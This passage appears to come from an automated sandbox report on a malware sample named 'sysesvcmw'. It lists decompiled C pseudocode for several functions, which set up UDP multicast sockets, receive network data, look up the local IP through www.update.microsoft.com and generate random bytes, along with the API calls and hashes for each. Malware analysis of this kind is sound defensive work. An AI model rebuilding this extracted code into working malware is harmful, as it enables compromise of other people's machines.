                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                                    • Opcode ID: 3abddafc972960b7a34b09499d5804bac4f0b45d7085fcd8f09acaffb4ecffc4
                                                                                                                                                                                                                                                                                    • Instruction ID: 76d768ee63a1ab765bf53bd3b80837b0909e15b9bb20e5c949896882321ca4fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abddafc972960b7a34b09499d5804bac4f0b45d7085fcd8f09acaffb4ecffc4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C4106B4E00208EBDB14DFE4D889BEEBBB5AF48304F108569E505B7290E7B55A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                                                                                                                                    			E0040D8A0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                                    				short _v8;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v33;
                                                                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				short _t24;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t39 = __esi;
                                                                                                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                                                                                                    				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t31 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                                    					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                                    					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                                    					__imp__#23(2, 2, 0x11, _t30);
                                                                                                                                                                                                                                                                                    					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t31, __edi);
                                                                                                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						return _t31;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_t24 = _v8;
                                                                                                                                                                                                                                                                                    					_v24 = _t24;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t39);
                                                                                                                                                                                                                                                                                    					_v30 = _t24;
                                                                                                                                                                                                                                                                                    					_v33 = 1;
                                                                                                                                                                                                                                                                                    					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                                    					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DAD0, _t31, 0, 0);
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040DD00(_t31, _t38);
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a8
                                                                                                                                                                                                                                                                                    0x0040d994
                                                                                                                                                                                                                                                                                    0x0040d8b6
                                                                                                                                                                                                                                                                                    0x0040d8c5
                                                                                                                                                                                                                                                                                    0x0040d8cb
                                                                                                                                                                                                                                                                                    0x0040d8d1
                                                                                                                                                                                                                                                                                    0x0040d8d8
                                                                                                                                                                                                                                                                                    0x0040d8e4
                                                                                                                                                                                                                                                                                    0x0040d8e7
                                                                                                                                                                                                                                                                                    0x0040d8ed
                                                                                                                                                                                                                                                                                    0x0040d8f3
                                                                                                                                                                                                                                                                                    0x0040d8f5
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fe
                                                                                                                                                                                                                                                                                    0x0040d98e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d990
                                                                                                                                                                                                                                                                                    0x0040d906
                                                                                                                                                                                                                                                                                    0x0040d90a
                                                                                                                                                                                                                                                                                    0x0040d90e
                                                                                                                                                                                                                                                                                    0x0040d912
                                                                                                                                                                                                                                                                                    0x0040d917
                                                                                                                                                                                                                                                                                    0x0040d921
                                                                                                                                                                                                                                                                                    0x0040d925
                                                                                                                                                                                                                                                                                    0x0040d92a
                                                                                                                                                                                                                                                                                    0x0040d939
                                                                                                                                                                                                                                                                                    0x0040d93e
                                                                                                                                                                                                                                                                                    0x0040d943
                                                                                                                                                                                                                                                                                    0x0040d94c
                                                                                                                                                                                                                                                                                    0x0040d95d
                                                                                                                                                                                                                                                                                    0x0040d966
                                                                                                                                                                                                                                                                                    0x0040d982
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x0040d968
                                                                                                                                                                                                                                                                                    0x0040d973
                                                                                                                                                                                                                                                                                    0x0040d973

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D8D8
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D8E7
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040D92A
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040D94C
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040D95D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000DAD0,00000000,00000000,00000000), ref: 0040D985
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 05ebf89ae4aef0f9de86e26819af3cc3888251010e7b9e55e68cfc395c831c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 030b81ab5cfdece744e4193ec97e607ba68bdf4ca273294f478105adee985cb3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ebf89ae4aef0f9de86e26819af3cc3888251010e7b9e55e68cfc395c831c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721A1B4A44301AFE710DFA48C8AB577AA0EF44710F50857AFA54DA2C1D7F4C9488B6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040B540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _a16;
                                                                                                                                                                                                                                                                                    				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _a8;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					_t38 = _a4;
                                                                                                                                                                                                                                                                                    					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                                                                                                                                                                                                                    					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v16 > 0) {
                                                                                                                                                                                                                                                                                    						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                                    							_v24 = _a12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = _v16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t43 = _a4;
                                                                                                                                                                                                                                                                                    						__imp__#16(_t43, _v8, _v24, 0);
                                                                                                                                                                                                                                                                                    						_v20 = _t43;
                                                                                                                                                                                                                                                                                    						if(_v20 > 0) {
                                                                                                                                                                                                                                                                                    							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                                    							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(1);
                                                                                                                                                                                                                                                                                    					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040b549
                                                                                                                                                                                                                                                                                    0x0040b550
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b561
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b574
                                                                                                                                                                                                                                                                                    0x0040b578
                                                                                                                                                                                                                                                                                    0x0040b581
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b589
                                                                                                                                                                                                                                                                                    0x0040b591
                                                                                                                                                                                                                                                                                    0x0040b59e
                                                                                                                                                                                                                                                                                    0x0040b593
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b5ab
                                                                                                                                                                                                                                                                                    0x0040b5af
                                                                                                                                                                                                                                                                                    0x0040b5b5
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5c2
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5d6
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5e4
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x0040b5ff
                                                                                                                                                                                                                                                                                    0x0040b60b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B552
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B578
                                                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B5AF
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5C4
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040B5E4
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5EA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction ID: 64461f39ab81653a4184227da93eab0719a9ebb5afb4910718686698f9d98f64
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7131EF74900209EFCB14DFA4DD48AEE7BB5FF48315F1086AAE825A3290D7749A50CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                                                                                                                                                    			E00409540() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				short _v38;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				short _v42;
                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_v18 = 0;
                                                                                                                                                                                                                                                                                    				_v14 = 0;
                                                                                                                                                                                                                                                                                    				_v10 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 2;
                                                                                                                                                                                                                                                                                    				__imp__#9(0x50);
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_t28 = E00409500("www.update.microsoft.com");
                                                                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 1, 0);
                                                                                                                                                                                                                                                                                    				_v28 = _t28;
                                                                                                                                                                                                                                                                                    				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t30 =  &_v24;
                                                                                                                                                                                                                                                                                    					__imp__#4(_v28, _t30, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    						_v44 = 0;
                                                                                                                                                                                                                                                                                    						_v42 = 0;
                                                                                                                                                                                                                                                                                    						_v38 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v48 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                                                                                                                                                                                                                    						_v8 = _v40;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00409600(_v28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    0x00409546
                                                                                                                                                                                                                                                                                    0x0040954f
                                                                                                                                                                                                                                                                                    0x00409555
                                                                                                                                                                                                                                                                                    0x00409558
                                                                                                                                                                                                                                                                                    0x0040955b
                                                                                                                                                                                                                                                                                    0x0040955e
                                                                                                                                                                                                                                                                                    0x00409567
                                                                                                                                                                                                                                                                                    0x0040956d
                                                                                                                                                                                                                                                                                    0x00409573
                                                                                                                                                                                                                                                                                    0x0040957c
                                                                                                                                                                                                                                                                                    0x00409584
                                                                                                                                                                                                                                                                                    0x0040958d
                                                                                                                                                                                                                                                                                    0x00409593
                                                                                                                                                                                                                                                                                    0x0040959a
                                                                                                                                                                                                                                                                                    0x0040959e
                                                                                                                                                                                                                                                                                    0x004095a6
                                                                                                                                                                                                                                                                                    0x004095ae
                                                                                                                                                                                                                                                                                    0x004095b2
                                                                                                                                                                                                                                                                                    0x004095b8
                                                                                                                                                                                                                                                                                    0x004095bb
                                                                                                                                                                                                                                                                                    0x004095be
                                                                                                                                                                                                                                                                                    0x004095c1
                                                                                                                                                                                                                                                                                    0x004095c5
                                                                                                                                                                                                                                                                                    0x004095d8
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e8
                                                                                                                                                                                                                                                                                    0x004095ed
                                                                                                                                                                                                                                                                                    0x004095f6

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: inet_addr.WS2_32(00409581), ref: 0040950A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: gethostbyname.WS2_32(?), ref: 0040951D
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 00409577
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dec295092395f23a9cc8e75f3d945b5eddd047bf9da38ba452b3522f7f48efc
                                                                                                                                                                                                                                                                                    • Instruction ID: 389a469d72f566baadd69971dc4dec0fd14d74987819c9d890e36e211f91e18c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dec295092395f23a9cc8e75f3d945b5eddd047bf9da38ba452b3522f7f48efc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD210EB5D14309ABCB04DFE4D846AEFBBB4AF48310F108169E505F3390E7745A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040A870(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    				_t6 = _t1;
                                                                                                                                                                                                                                                                                    				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                                                                    					_t4 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                                    					_t5 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t6;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a883
                                                                                                                                                                                                                                                                                    0x0040a88b
                                                                                                                                                                                                                                                                                    0x0040a895
                                                                                                                                                                                                                                                                                    0x0040a899
                                                                                                                                                                                                                                                                                    0x0040a8a1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040a8a5
                                                                                                                                                                                                                                                                                    0x0040a8ae

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Ee@,00000000,00000000,00000001,F0000040,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A883
                                                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Ee@,?,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A899
                                                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Ee@,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A8A5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                    • String ID: Ee@
                                                                                                                                                                                                                                                                                    • API String ID: 1815803762-3880142923
                                                                                                                                                                                                                                                                                    • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction ID: 1edff0947e8a0bec857b7d5bc171d56b6abde249d8757a471d495e886690916f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E01275650308FBDB14DBD1EC49F9A777CAB48740F108154B709A7284DAB5EA408768
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                    			E0040DD70(void* __edi) {
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t27 = __edi;
                                                                                                                                                                                                                                                                                    				_t24 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                                    				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                                    				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 2, 0x11);
                                                                                                                                                                                                                                                                                    				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                                    				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					E0040DD00(_t24, __edi);
